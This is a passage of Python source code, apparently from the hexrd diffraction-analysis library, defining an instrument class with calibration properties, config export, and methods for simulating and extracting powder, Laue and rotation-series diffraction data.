bool\n self._calibration_parameters = np.hstack(\n [self._calibration_parameters,\n det_params]\n ).flatten()\n self._calibration_flags = np.hstack(\n [self._calibration_flags,\n det_flags]\n )\n return\n\n # properties for physical size of rectangular detector\n @property\n def id(self):\n return self._id\n\n @property\n def num_panels(self):\n return self._num_panels\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def detector_parameters(self):\n pdict = {}\n for key, panel in self.detectors.items():\n pdict[key] = panel.config_dict(\n self.chi, self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n return pdict\n\n @property\n def tvec(self):\n return self._tvec\n\n @tvec.setter\n def tvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3, 'input must have length = 3'\n self._tvec = x\n\n @property\n def chi(self):\n return self._chi\n\n @chi.setter\n def chi(self, x):\n self._chi = float(x)\n\n @property\n def beam_energy(self):\n return self._beam_energy\n\n @beam_energy.setter\n def beam_energy(self, x):\n self._beam_energy = float(x)\n\n @property\n def beam_wavelength(self):\n return ct.keVToAngstrom(self.beam_energy)\n\n @property\n def beam_vector(self):\n return self._beam_vector\n\n @beam_vector.setter\n def beam_vector(self, x):\n x = np.array(x).flatten()\n if len(x) == 3:\n assert sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._beam_vector = x\n elif len(x) == 2:\n self._beam_vector = calc_beam_vec(*x)\n else:\n raise RuntimeError(\"input must be a unit vector or angle pair\")\n # ...maybe change dictionary item behavior for 3.x compatibility?\n for detector_id in self.detectors:\n panel = self.detectors[detector_id]\n panel.bvec = self._beam_vector\n\n @property\n def eta_vector(self):\n return self._eta_vector\n\n @eta_vector.setter\n def eta_vector(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._eta_vector = x\n # ...maybe change dictionary item behavior for 3.x compatibility?\n for detector_id in self.detectors:\n panel = self.detectors[detector_id]\n panel.evec = self._eta_vector\n\n @property\n def tilt_calibration_mapping(self):\n return self._tilt_calibration_mapping\n\n @tilt_calibration_mapping.setter\n def tilt_calibration_mapping(self, x):\n if not isinstance(x, RotMatEuler) and x is not None:\n raise RuntimeError(\n \"tilt mapping must be None or a 'RotMatEuler' instance\"\n )\n 
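        # descriptive note (assumption based on surrounding code): x is either None or a
        # RotMatEuler; when set, it is later used to express detector tilts as Euler angles
        # while assembling the instrument calibration parameter list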
self._tilt_calibration_mapping = x\n\n @property\n def calibration_parameters(self):\n \"\"\"\n Yields concatenated list of instrument parameters.\n\n Returns\n -------\n array_like\n concatenated list of instrument parameters.\n\n \"\"\"\n # grab angles from beam vec\n # !!! these are in DEGREES!\n azim, pola = calc_angles_from_beam_vec(self.beam_vector)\n\n # stack instrument level parameters\n # units: keV, degrees, mm\n calibration_parameters = [\n self.beam_energy,\n azim,\n pola,\n np.degrees(self.chi),\n *self.tvec,\n ]\n\n # collect info from panels and append\n det_params = []\n det_flags = []\n for detector in self.detectors.values():\n this_det_params = detector.calibration_parameters\n if self.tilt_calibration_mapping is not None:\n rmat = makeRotMatOfExpMap(detector.tilt)\n self.tilt_calibration_mapping.rmat = rmat\n tilt = np.degrees(self.tilt_calibration_mapping.angles)\n this_det_params[:3] = tilt\n det_params.append(this_det_params)\n det_flags.append(detector.calibration_flags)\n det_params = np.hstack(det_params)\n det_flags = np.hstack(det_flags)\n\n # !!! hstack here assumes that calib params will be float and\n # !!! flags will all be bool\n calibration_parameters = np.hstack(\n [calibration_parameters,\n det_params]\n ).flatten()\n self._calibration_parameters = calibration_parameters\n return self._calibration_parameters\n\n @property\n def calibration_flags(self):\n return self._calibration_flags\n\n @calibration_flags.setter\n def calibration_flags(self, x):\n x = np.array(x, dtype=bool).flatten()\n if len(x) != len(self._calibration_flags):\n raise RuntimeError(\n \"length of parameter list must be %d; you gave %d\"\n % (len(self._calibration_flags), len(x))\n )\n ii = 7\n for panel in self.detectors.values():\n npp = 6\n if panel.distortion is not None:\n npp += len(panel.distortion.params)\n panel.calibration_flags = x[ii:ii + npp]\n self._calibration_flags = x\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def write_config(self, filename=None, style='yaml', calibration_dict={}):\n \"\"\" WRITE OUT YAML FILE \"\"\"\n # initialize output dictionary\n assert style.lower() in ['yaml', 'hdf5'], \\\n \"style must be either 'yaml', or 'hdf5'; you gave '%s'\" % style\n\n par_dict = {}\n\n par_dict['id'] = self.id\n\n azim, pola = calc_angles_from_beam_vec(self.beam_vector)\n beam = dict(\n energy=self.beam_energy,\n vector=dict(\n azimuth=azim,\n polar_angle=pola,\n )\n )\n par_dict['beam'] = beam\n\n if calibration_dict:\n par_dict['calibration_crystal'] = calibration_dict\n\n ostage = dict(\n chi=self.chi,\n translation=self.tvec.tolist()\n )\n par_dict['oscillation_stage'] = ostage\n\n det_dict = dict.fromkeys(self.detectors)\n for det_name, detector in self.detectors.items():\n # grab panel config\n # !!! don't need beam or tvec\n # !!! 
have vetted style\n pdict = detector.config_dict(chi=self.chi, tvec=self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector,\n style=style)\n det_dict[det_name] = pdict['detector']\n par_dict['detectors'] = det_dict\n\n # handle output file if requested\n if filename is not None:\n if style.lower() == 'yaml':\n with open(filename, 'w') as f:\n yaml.dump(par_dict, stream=f)\n else:\n # hdf5\n with h5py.File(filename, 'w') as f:\n instr_grp = f.create_group('instrument')\n unwrap_dict_to_h5(instr_grp, par_dict, asattr=False)\n\n return par_dict\n\n def update_from_parameter_list(self, p):\n \"\"\"\n Update the instrument class from a parameter list.\n\n Utility function to update instrument parameters from a 1-d master\n parameter list (e.g. as used in calibration)\n\n !!! Note that angles are reported in DEGREES!\n \"\"\"\n self.beam_energy = p[0]\n self.beam_vector = calc_beam_vec(p[1], p[2])\n self.chi = np.radians(p[3])\n self.tvec = np.r_[p[4:7]]\n\n ii = 7\n for det_name, detector in self.detectors.items():\n this_det_params = detector.calibration_parameters\n npd = len(this_det_params) # total number of params\n dpnp = npd - 6 # number of distortion params\n\n # first do tilt\n tilt = np.r_[p[ii:ii + 3]]\n if self.tilt_calibration_mapping is not None:\n self.tilt_calibration_mapping.angles = np.radians(tilt)\n rmat = self.tilt_calibration_mapping.rmat\n phi, n = angleAxisOfRotMat(rmat)\n tilt = phi*n.flatten()\n detector.tilt = tilt\n\n # then do translation\n ii += 3\n detector.tvec = np.r_[p[ii:ii + 3]]\n\n # then do distortion (if necessart)\n # FIXME will need to update this with distortion fix\n ii += 3\n if dpnp > 0:\n if detector.distortion is None:\n raise RuntimeError(\n \"distortion discrepancy for '%s'!\"\n % det_name\n )\n else:\n try:\n detector.distortion.params = p[ii:ii + dpnp]\n except(AssertionError):\n raise RuntimeError(\n \"distortion for '%s' \" % det_name\n + \"expects %d params but got %d\"\n % (len(detector.distortion.params), dpnp)\n )\n ii += dpnp\n return\n\n def extract_polar_maps(self, plane_data, imgser_dict,\n active_hkls=None, threshold=None,\n tth_tol=None, eta_tol=0.25):\n \"\"\"\n Extract eta-omega maps from an imageseries.\n\n Quick and dirty way to histogram angular patch data for make\n pole figures suitable for fiber generation\n\n TODO: streamline projection code\n TODO: normalization\n !!!: images must be non-negative!\n \"\"\"\n if tth_tol is not None:\n plane_data.tThWidth = np.radians(tth_tol)\n else:\n tth_tol = np.degrees(plane_data.tThWidth)\n\n tth_ranges = plane_data.getTThRanges()\n if active_hkls is not None:\n assert hasattr(active_hkls, '__len__'), \\\n \"active_hkls must be an iterable with __len__\"\n tth_ranges = tth_ranges[active_hkls]\n\n # # need this for making eta ranges\n # eta_tol_vec = 0.5*np.radians([-eta_tol, eta_tol])\n\n # make rings clipped to panel\n # !!! eta_idx has the same length as plane_data.exclusions\n # each entry are the integer indices into the bins\n # !!! 
eta_edges is the list of eta bin EDGES\n # We can use the same eta_edge for all detectors, so calculate it once\n pow_angs, pow_xys, eta_idx, eta_edges = list(\n self.detectors.values()\n )[0].make_powder_rings(plane_data,\n merge_hkls=False, delta_eta=eta_tol,\n full_output=True)\n delta_eta = eta_edges[1] - eta_edges[0]\n ncols_eta = len(eta_edges) - 1\n\n ring_maps_panel = dict.fromkeys(self.detectors)\n for i_d, det_key in enumerate(self.detectors):\n print(\"working on detector '%s'...\" % det_key)\n\n # grab panel\n panel = self.detectors[det_key]\n # native_area = panel.pixel_area # pixel ref area\n\n # pixel angular coords for the detector panel\n ptth, peta = panel.pixel_angles()\n\n # grab omegas from imageseries and squawk if missing\n try:\n omegas = imgser_dict[det_key].metadata['omega']\n except(KeyError):\n msg = \"imageseries for '%s' has no omega info\" % det_key\n raise RuntimeError(msg)\n\n # initialize maps and assing by row (omega/frame)\n nrows_ome = len(omegas)\n\n # init map with NaNs\n shape = (len(tth_ranges), nrows_ome, ncols_eta)\n ring_maps = np.full(shape, np.nan)\n\n # Generate ring parameters once, and re-use them for each image\n ring_params = []\n for tthr in tth_ranges:\n kwargs = {\n 'tthr': tthr,\n 'ptth': ptth,\n 'peta': peta,\n 'eta_edges': eta_edges,\n 'delta_eta': delta_eta,\n }\n ring_params.append(_generate_ring_params(**kwargs))\n\n # Divide up the images among processes\n ims = imgser_dict[det_key]\n tasks = distribute_tasks(len(ims), self.max_workers)\n func = partial(_run_histograms, ims=ims, tth_ranges=tth_ranges,\n ring_maps=ring_maps, ring_params=ring_params,\n threshold=threshold)\n\n with ThreadPoolExecutor(max_workers=self.max_workers) as executor:\n executor.map(func, tasks)\n\n ring_maps_panel[det_key] = ring_maps\n\n return ring_maps_panel, eta_edges\n\n def extract_line_positions(self, plane_data, imgser_dict,\n tth_tol=None, eta_tol=1., npdiv=2,\n eta_centers=None,\n collapse_eta=True, collapse_tth=False,\n do_interpolation=True):\n \"\"\"\n Perform annular interpolation on diffraction images.\n\n Provides data for extracting the line positions from powder diffraction\n images, pole figure patches from imageseries, or Bragg peaks from\n Laue diffraction images.\n\n Parameters\n ----------\n plane_data : hexrd.crystallography.PlaneData object or array_like\n Object determining the 2theta positions for the integration\n sectors. If PlaneData, this will be all non-excluded reflections,\n subject to merging within PlaneData.tThWidth. If array_like,\n interpreted as a list of 2theta angles IN RADIAN (this may change).\n imgser_dict : dict\n Dictionary of powder diffraction images, one for each detector.\n tth_tol : scalar, optional\n The radial (i.e. 2theta) width of the integration sectors\n IN DEGREES. This arg is required if plane_data is array_like.\n The default is None.\n eta_tol : scalar, optional\n The azimuthal (i.e. eta) width of the integration sectors\n IN DEGREES. The default is 1.\n npdiv : int, optional\n The number of oversampling pixel subdivision (see notes).\n The default is 2.\n eta_centers : array_like, optional\n The desired azimuthal sector centers. The default is None. If\n None, then bins are distrubted sequentially from (-180, 180).\n collapse_eta : bool, optional\n Flag for summing sectors in eta. The default is True.\n collapse_tth : bool, optional\n Flag for summing sectors in 2theta. The default is False.\n do_interpolation : bool, optional\n If True, perform bilinear interpolation. 
The default is True.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n panel_data : dict\n Dictionary over the detctors with the following structure:\n [list over (merged) 2theta ranges]\n [list over valid eta sectors]\n [angle data ,\n bin intensities ]\n\n Notes\n -----\n TODO: May change the array_like input units to degrees.\n TODO: rename function.\n\n \"\"\"\n if not hasattr(plane_data, '__len__'):\n plane_data = plane_data.makeNew() # make local copy to munge\n if tth_tol is not None:\n plane_data.tThWidth = np.radians(tth_tol)\n tth_ranges = np.degrees(plane_data.getMergedRanges()[1])\n tth_tols = np.hstack([i[1] - i[0] for i in tth_ranges])\n else:\n tth_tols = np.ones(len(plane_data))*tth_tol\n\n # =====================================================================\n # LOOP OVER DETECTORS\n # =====================================================================\n panel_data = dict.fromkeys(self.detectors)\n for i_det, detector_id in enumerate(self.detectors):\n print(\"working on detector '%s'...\" % detector_id)\n # pbar.update(i_det + 1)\n # grab panel\n panel = self.detectors[detector_id]\n instr_cfg = panel.config_dict(\n chi=self.chi, tvec=self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n native_area = panel.pixel_area # pixel ref area\n images = imgser_dict[detector_id]\n if images.ndim == 2:\n n_images = 1\n images = np.tile(images, (1, 1, 1))\n elif images.ndim == 3:\n n_images = len(images)\n else:\n raise RuntimeError(\"images must be 2- or 3-d\")\n\n # make rings\n pow_angs, pow_xys = panel.make_powder_rings(\n plane_data, merge_hkls=True,\n delta_tth=tth_tol, delta_eta=eta_tol,\n eta_list=eta_centers)\n\n # =================================================================\n # LOOP OVER RING SETS\n # =================================================================\n ring_data = []\n for i_ring, these_data in enumerate(zip(pow_angs, pow_xys)):\n print(\"interpolating 2theta bin %d...\" % i_ring)\n\n # points are already checked to fall on detector\n angs = these_data[0]\n xys = these_data[1]\n\n # make the tth,eta patches for interpolation\n patches = xrdutil.make_reflection_patches(\n instr_cfg, angs, panel.angularPixelSize(xys),\n tth_tol=tth_tols[i_ring], eta_tol=eta_tol,\n npdiv=npdiv, quiet=True)\n\n # loop over patches\n # FIXME: fix initialization\n if collapse_tth:\n patch_data = np.zeros((len(angs), n_images))\n else:\n patch_data = []\n for i_p, patch in enumerate(patches):\n # strip relevant objects out of current patch\n vtx_angs, vtx_xys, conn, areas, xys_eval, ijs = patch\n\n # need to reshape eval pts for interpolation\n xy_eval = np.vstack([\n xys_eval[0].flatten(),\n xys_eval[1].flatten()]).T\n\n _, on_panel = panel.clip_to_panel(xy_eval)\n\n if np.any(~on_panel):\n continue\n\n if collapse_tth:\n ang_data = (vtx_angs[0][0, [0, -1]],\n vtx_angs[1][[0, -1], 0])\n elif collapse_eta:\n # !!! 
yield the tth bin centers\n tth_centers = np.average(\n np.vstack([vtx_angs[0][0, :-1], vtx_angs[0][0, 1:]]),\n axis=0\n )\n ang_data = (tth_centers,\n angs[i_p][-1])\n else:\n ang_data = vtx_angs\n\n prows, pcols = areas.shape\n area_fac = areas/float(native_area)\n\n # interpolate\n if not collapse_tth:\n ims_data = []\n for j_p in np.arange(len(images)):\n # catch interpolation type\n image = images[j_p]\n if do_interpolation:\n tmp = panel.interpolate_bilinear(\n xy_eval,\n image,\n ).reshape(prows, pcols)*area_fac\n else:\n tmp = image[ijs[0], ijs[1]]*area_fac\n\n # catch collapsing options\n if collapse_tth:\n patch_data[i_p, j_p] = np.average(tmp)\n # ims_data.append(np.sum(tmp))\n else:\n if collapse_eta:\n ims_data.append(np.average(tmp, axis=0))\n else:\n ims_data.append(tmp)\n pass # close image loop\n if not collapse_tth:\n patch_data.append((ang_data, ims_data))\n pass # close patch loop\n ring_data.append(patch_data)\n pass # close ring loop\n panel_data[detector_id] = ring_data\n pass # close panel loop\n # pbar.finish()\n return panel_data\n\n def simulate_powder_pattern(self,\n mat_list,\n params=None,\n bkgmethod=None,\n origin=None,\n noise=None):\n \"\"\"\n Generate powder diffraction iamges from specified materials.\n\n Parameters\n ----------\n mat_list : array_like (n, )\n List of Material classes.\n params : dict, optional\n Dictionary of LeBail parameters (see Notes). The default is None.\n bkgmethod : dict, optional\n Background function specification. The default is None.\n origin : array_like (3,), optional\n Vector describing the origin of the diffrction volume.\n The default is None, wiich is equivalent to [0, 0, 0].\n noise : str, optional\n Flag describing type of noise to be applied. The default is None.\n\n Returns\n -------\n img_dict : dict\n Dictionary of diffraciton images over the detectors.\n\n Notes\n -----\n TODO: add more controls for noise function.\n TODO: modify hooks to LeBail parameters.\n TODO: add optional volume fraction weights for phases in mat_list\n \"\"\"\n \"\"\"\n >> @AUTHOR: Saransh Singh, Lanwrence Livermore National Lab,\n saransh1@llnl.gov\n >> @DATE: 01/22/2021 SS 1.0 original\n >> @DETAILS: adding hook to WPPF class. this changes the input list\n significantly\n \"\"\"\n if origin is None:\n origin = self.tvec\n origin = np.asarray(origin).squeeze()\n assert len(origin) == 3, \\\n \"origin must be a 3-element sequence\"\n\n '''\n if params is none, fill in some sane default values\n only the first value is used. the rest of the values are\n the upper, lower bounds and vary flag for refinement which\n are not used but required for interfacing with WPPF\n\n zero_error : zero shift error\n U, V, W : Cagliotti parameters\n P, X, Y : Lorentzian parameters\n eta1, eta2, eta3 : Mixing parameters\n '''\n if(params is None):\n # params = {'zero_error': [0.0, -1., 1., True],\n # 'U': [2e-1, -1., 1., True],\n # 'V': [2e-2, -1., 1., True],\n # 'W': [2e-2, -1., 1., True],\n # 'X': [2e-1, -1., 1., True],\n # 'Y': [2e-1, -1., 1., True]\n # }\n params = wppfsupport._generate_default_parameters_LeBail(\n mat_list,\n 1)\n '''\n use the material list to obtain the dictionary of initial intensities\n we need to make sure that the intensities are properly scaled by the\n lorentz polarization factor. 
since the calculation is done in the\n LeBail class, all that means is the initial intensity needs that factor\n in there\n '''\n img_dict = dict.fromkeys(self.detectors)\n\n # find min and max tth over all panels\n tth_mi = np.inf\n tth_ma = 0.\n ptth_dict = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n ptth, peta = panel.pixel_angles(origin=origin)\n tth_mi = min(tth_mi, ptth.min())\n tth_ma = max(tth_ma, ptth.max())\n ptth_dict[det_key] = ptth\n\n '''\n now make a list of two theta and dummy ones for the experimental\n spectrum this is never really used so any values should be okay. We\n could also pas the integrated detector image if we would like to\n simulate some realistic background. But thats for another day.\n '''\n # convert angles to degrees because thats what the WPPF expects\n tth_mi = np.degrees(tth_mi)\n tth_ma = np.degrees(tth_ma)\n\n # get tth angular resolution for instrument\n ang_res = max_resolution(self)\n\n # !!! calc nsteps by oversampling\n nsteps = int(np.ceil(2*(tth_ma - tth_mi)/np.degrees(ang_res[0])))\n\n # evaulation vector for LeBail\n tth = np.linspace(tth_mi, tth_ma, nsteps)\n\n expt = np.vstack([tth, np.ones_like(tth)]).T\n\n wavelength = [\n valWUnit('lp', 'length', self.beam_wavelength, 'angstrom'),\n 1.\n ]\n\n '''\n now go through the material list and get the intensity dictionary\n '''\n intensity = {}\n for mat in mat_list:\n\n multiplicity = mat.planeData.getMultiplicity()\n\n tth = mat.planeData.getTTh()\n\n LP = (1 + np.cos(tth)**2) / \\\n np.cos(0.5*tth)/np.sin(0.5*tth)**2\n\n intensity[mat.name] = {}\n intensity[mat.name]['synchrotron'] = \\\n mat.planeData.get_structFact() * LP * multiplicity\n\n kwargs = {\n 'expt_spectrum': expt,\n 'params': params,\n 'phases': mat_list,\n 'wavelength': {\n 'synchrotron': wavelength\n },\n 'bkgmethod': bkgmethod,\n 'intensity_init': intensity,\n 'peakshape': 'pvtch'\n }\n\n self.WPPFclass = LeBail(**kwargs)\n\n self.simulated_spectrum = self.WPPFclass.spectrum_sim\n self.background = self.WPPFclass.background\n\n '''\n now that we have the simulated intensities, its time to get the\n two theta for the detector pixels and interpolate what the intensity\n for each pixel should be\n '''\n\n img_dict = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n ptth = ptth_dict[det_key]\n\n img = np.interp(np.degrees(ptth),\n self.simulated_spectrum.x,\n self.simulated_spectrum.y + self.background.y)\n\n # normalize everything to 0-1\n mi = img.min()\n ma = img.max()\n\n if(ma > mi):\n img = (img - mi) / (ma - mi)\n\n if(noise is None):\n img_dict[det_key] = img\n\n else:\n if(noise.lower() == 'poisson'):\n im_noise = random_noise(img,\n mode='poisson',\n clip=True)\n mi = im_noise.min()\n ma = im_noise.max()\n if(ma > mi):\n im_noise = (im_noise - mi)/(ma - mi)\n\n img_dict[det_key] = im_noise\n\n elif(noise.lower() == 'gaussian'):\n img_dict[det_key] = random_noise(img,\n mode='gaussian',\n clip=True)\n\n elif(noise.lower() == 'salt'):\n img_dict[det_key] = random_noise(img, mode='salt')\n\n elif(noise.lower() == 'pepper'):\n img_dict[det_key] = random_noise(img, mode='pepper')\n\n elif(noise.lower() == 's&p'):\n img_dict[det_key] = random_noise(img, mode='s&p')\n\n elif(noise.lower() == 'speckle'):\n img_dict[det_key] = random_noise(img,\n mode='speckle',\n clip=True)\n\n return img_dict\n\n def simulate_laue_pattern(self, crystal_data,\n minEnergy=5., maxEnergy=35.,\n rmat_s=None, grain_params=None):\n \"\"\"\n Simulate Laue diffraction over the 
instrument.\n\n Parameters\n ----------\n crystal_data : TYPE\n DESCRIPTION.\n minEnergy : TYPE, optional\n DESCRIPTION. The default is 5..\n maxEnergy : TYPE, optional\n DESCRIPTION. The default is 35..\n rmat_s : TYPE, optional\n DESCRIPTION. The default is None.\n grain_params : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n results : TYPE\n DESCRIPTION.\n\n TODO: revisit output; dict, or concatenated list?\n \"\"\"\n results = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n results[det_key] = panel.simulate_laue_pattern(\n crystal_data,\n minEnergy=minEnergy, maxEnergy=maxEnergy,\n rmat_s=rmat_s, tvec_s=self.tvec,\n grain_params=grain_params,\n beam_vec=self.beam_vector)\n return results\n\n def simulate_rotation_series(self, plane_data, grain_param_list,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n wavelength=None):\n \"\"\"\n Simulate a monochromatic rotation series over the instrument.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_param_list : TYPE\n DESCRIPTION.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n wavelength : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n results : TYPE\n DESCRIPTION.\n\n TODO: revisit output; dict, or concatenated list?\n \"\"\"\n results = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n results[det_key] = panel.simulate_rotation_series(\n plane_data, grain_param_list,\n eta_ranges=eta_ranges,\n ome_ranges=ome_ranges,\n ome_period=ome_period,\n chi=self.chi, tVec_s=self.tvec,\n wavelength=wavelength)\n return results\n\n def pull_spots(self, plane_data, grain_params,\n imgser_dict,\n tth_tol=0.25, eta_tol=1., ome_tol=1.,\n npdiv=2, threshold=10,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n dirname='results', filename=None, output_format='text',\n return_spot_list=False,\n quiet=True, check_only=False,\n interp='nearest'):\n \"\"\"\n Exctract reflection info from a rotation series.\n\n Input must be encoded as an OmegaImageseries object.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_params : TYPE\n DESCRIPTION.\n imgser_dict : TYPE\n DESCRIPTION.\n tth_tol : TYPE, optional\n DESCRIPTION. The default is 0.25.\n eta_tol : TYPE, optional\n DESCRIPTION. The default is 1..\n ome_tol : TYPE, optional\n DESCRIPTION. The default is 1..\n npdiv : TYPE, optional\n DESCRIPTION. The default is 2.\n threshold : TYPE, optional\n DESCRIPTION. The default is 10.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n dirname : TYPE, optional\n DESCRIPTION. The default is 'results'.\n filename : TYPE, optional\n DESCRIPTION. The default is None.\n output_format : TYPE, optional\n DESCRIPTION. The default is 'text'.\n return_spot_list : TYPE, optional\n DESCRIPTION. The default is False.\n quiet : TYPE, optional\n DESCRIPTION. The default is True.\n check_only : TYPE, optional\n DESCRIPTION. The default is False.\n interp : TYPE, optional\n DESCRIPTION. 
The default is 'nearest'.\n\n Returns\n -------\n compl : TYPE\n DESCRIPTION.\n output : TYPE\n DESCRIPTION.\n\n \"\"\"\n # grain parameters\n rMat_c = makeRotMatOfExpMap(grain_params[:3])\n tVec_c = grain_params[3:6]\n\n # grab omega ranges from first imageseries\n #\n # WARNING: all imageseries AND all wedges within are assumed to have\n # the same omega values; put in a check that they are all the same???\n oims0 = next(iter(imgser_dict.values()))\n ome_ranges = [np.radians([i['ostart'], i['ostop']])\n for i in oims0.omegawedges.wedges]\n\n # delta omega in DEGREES grabbed from first imageseries in the dict\n delta_ome = oims0.omega[0, 1] - oims0.omega[0, 0]\n\n # make omega grid for frame expansion around reference frame\n # in DEGREES\n ndiv_ome, ome_del = make_tolerance_grid(\n delta_ome, ome_tol, 1, adjust_window=True,\n )\n\n # generate structuring element for connected component labeling\n if ndiv_ome == 1:\n label_struct = ndimage.generate_binary_structure(2, 2)\n else:\n label_struct = ndimage.generate_binary_structure(3, 3)\n\n # simulate rotation series\n sim_results = self.simulate_rotation_series(\n plane_data, [grain_params, ],\n eta_ranges=eta_ranges,\n ome_ranges=ome_ranges,\n ome_period=ome_period)\n\n # patch vertex generator (global for instrument)\n tol_vec = 0.5*np.radians(\n [-tth_tol, -eta_tol,\n -tth_tol, eta_tol,\n tth_tol, eta_tol,\n tth_tol, -eta_tol])\n\n # prepare output if requested\n if filename is not None and output_format.lower() == 'hdf5':\n this_filename = os.path.join(dirname, filename)\n writer = GrainDataWriter_h5(\n os.path.join(dirname, filename),\n self.write_config(), grain_params)\n\n # =====================================================================\n # LOOP OVER PANELS\n # =====================================================================\n iRefl = 0\n compl = []\n output = dict.fromkeys(self.detectors)\n for detector_id in self.detectors:\n # initialize text-based output writer\n if filename is not None and output_format.lower() == 'text':\n output_dir = os.path.join(\n dirname, detector_id\n )\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n this_filename = os.path.join(\n output_dir, filename\n )\n writer = PatchDataWriter(this_filename)\n\n # grab panel\n panel = self.detectors[detector_id]\n instr_cfg = panel.config_dict(\n self.chi, self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n native_area = panel.pixel_area # pixel ref area\n\n # pull out the OmegaImageSeries for this panel from input dict\n ome_imgser = imgser_dict[detector_id]\n\n # extract simulation results\n sim_results_p = sim_results[detector_id]\n hkl_ids = sim_results_p[0][0]\n hkls_p = sim_results_p[1][0]\n ang_centers = sim_results_p[2][0]\n xy_centers = sim_results_p[3][0]\n ang_pixel_size = sim_results_p[4][0]\n\n # now verify that full patch falls on detector...\n # ???: strictly necessary?\n #\n # patch vertex array from sim\n nangs = len(ang_centers)\n patch_vertices = (\n np.tile(ang_centers[:, :2], (1, 4)) +\n np.tile(tol_vec, (nangs, 1))\n ).reshape(4*nangs, 2)\n ome_dupl = np.tile(\n ang_centers[:, 2], (4, 1)\n ).T.reshape(len(patch_vertices), 1)\n\n # find vertices that all fall on the panel\n det_xy, rmats_s, on_plane = xrdutil._project_on_detector_plane(\n np.hstack([patch_vertices, ome_dupl]),\n panel.rmat, rMat_c, self.chi,\n panel.tvec, tVec_c, self.tvec,\n panel.distortion)\n _, on_panel = panel.clip_to_panel(det_xy, buffer_edges=True)\n\n # all vertices must be on...\n patch_is_on = 
np.all(on_panel.reshape(nangs, 4), axis=1)\n patch_xys = det_xy.reshape(nangs, 4, 2)[patch_is_on]\n\n # re-filter...\n hkl_ids = hkl_ids[patch_is_on]\n hkls_p = hkls_p[patch_is_on, :]\n ang_centers = ang_centers[patch_is_on, :]\n xy_centers = xy_centers[patch_is_on, :]\n ang_pixel_size = ang_pixel_size[patch_is_on, :]\n\n # TODO: add polygon testing right here!\n # done \n if check_only:\n patch_output = []\n for i_pt, angs in enumerate(ang_centers):\n # the evaluation omegas;\n # expand about the central value using tol vector\n ome_eval = np.degrees(angs[2]) + ome_del\n\n # ...vectorize the omega_to_frame function to avoid loop?\n frame_indices = [\n ome_imgser.omega_to_frame(ome)[0] for ome in ome_eval\n ]\n if -1 in frame_indices:\n if not quiet:\n msg = \"\"\"\n window for (%d%d%d) falls outside omega range\n \"\"\" % tuple(hkls_p[i_pt, :])\n print(msg)\n continue\n else:\n these_vertices = patch_xys[i_pt]\n ijs = panel.cartToPixel(these_vertices)\n ii, jj = polygon(ijs[:, 0], ijs[:, 1])\n contains_signal = False\n for i_frame in frame_indices:\n contains_signal = contains_signal or np.any(\n ome_imgser[i_frame][ii, jj] > threshold\n )\n compl.append(contains_signal)\n patch_output.append((ii, jj, frame_indices))\n else:\n # make the tth,eta patches for interpolation\n patches = xrdutil.make_reflection_patches(\n instr_cfg,\n ang_centers[:, :2], ang_pixel_size,\n omega=ang_centers[:, 2],\n tth_tol=tth_tol, eta_tol=eta_tol,\n rmat_c=rMat_c, tvec_c=tVec_c,\n npdiv=npdiv, quiet=True)\n\n # GRAND LOOP over reflections for this panel\n patch_output = []\n for i_pt, patch in enumerate(patches):\n\n # strip relevant objects out of current patch\n vtx_angs, vtx_xy, conn, areas, xy_eval, ijs = patch\n\n prows, pcols = areas.shape\n nrm_fac = areas/float(native_area)\n nrm_fac = nrm_fac / np.min(nrm_fac)\n\n # grab hkl info\n hkl = hkls_p[i_pt, :]\n hkl_id = hkl_ids[i_pt]\n\n # edge arrays\n tth_edges = vtx_angs[0][0, :]\n delta_tth = tth_edges[1] - tth_edges[0]\n eta_edges = vtx_angs[1][:, 0]\n delta_eta = eta_edges[1] - eta_edges[0]\n\n # need to reshape eval pts for interpolation\n xy_eval = np.vstack([xy_eval[0].flatten(),\n xy_eval[1].flatten()]).T\n\n # the evaluation omegas;\n # expand about the central value using tol vector\n ome_eval = np.degrees(ang_centers[i_pt, 2]) + ome_del\n\n # ???: vectorize the omega_to_frame function to avoid loop?\n frame_indices = [\n ome_imgser.omega_to_frame(ome)[0] for ome in ome_eval\n ]\n\n if -1 in frame_indices:\n if not quiet:\n msg = \"\"\"\n window for (%d%d%d) falls outside omega range\n \"\"\" % tuple(hkl)\n print(msg)\n continue\n else:\n # initialize spot data parameters\n # !!! 
